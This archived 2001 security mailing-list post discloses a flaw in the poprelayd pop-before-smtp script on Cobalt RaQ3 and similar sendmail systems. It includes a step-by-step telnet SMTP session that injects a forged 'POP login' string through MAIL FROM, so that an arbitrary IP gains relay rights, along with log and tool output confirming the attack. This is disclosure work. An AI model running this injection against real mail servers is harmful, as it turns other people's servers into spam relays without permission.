OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Andrea Barisani (lcarsinfis.univ.trieste.it)
Date: Tue Jul 03 2001 - 12:05:10 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi to all,

    Poprelayd is a simple script that scan /var/log/maillog for valid pop
    logins and updates a hash db used by sendmail to permit relaying for
    those valid pop users, this method is called "Pop-before-smtp".

    The syslog string searched by the script is in this form for the qpop
    server
            
    /POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9]\.]+)/)

    On some cobalt raq3 servers (with the poprelayd add-on packet installed )
    and in general on any system running the poprelayd script with sendmail is
    possible to "inject" this string in the syslog using sendmail logging. So
    anyone can insert a fake string with his own IP wich will be parsed by
    poprelayd and that will permit the use of sendmail as a relay.

    On cobalts the presence of poprelayd is revealed by the modified sendmail
    relaying denied message "Relaying denied. Please check your mail first."

    Example:

    telnet dumbcobalt 25
    Trying 123.123.123.123...
    Connected to dumbcobalt
    ...
    ehlo dumbcobalt
    ...
    mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
    linux.org"
    553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
    linux.org"...Domain name required

    now the IP 66.66.66.66 can do relay :)

    in fact, on dumbcobalt:

    in /var/log/maillog

    ...reject=533 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
    linux.org", size=0, class=0 ....etc etc...

    [rootdumbcobalt /]# /usr/sbin/poprelayd -p
    66.66.66.66 7

    ;-)

    Bye

    ------------------------------------------------------------
    INFIS Network Administrator & Security Officer
    Department of Physics - University of Trieste
    lcarsinfis.univ.trieste.it - PGP Key 0x8E21FE82
    ------------------------------------------------------------
    "How would you know I'm mad?" said Alice.
    "You must be,'said the Cat,'or you wouldn't have come here."
    ------------------------------------------------------------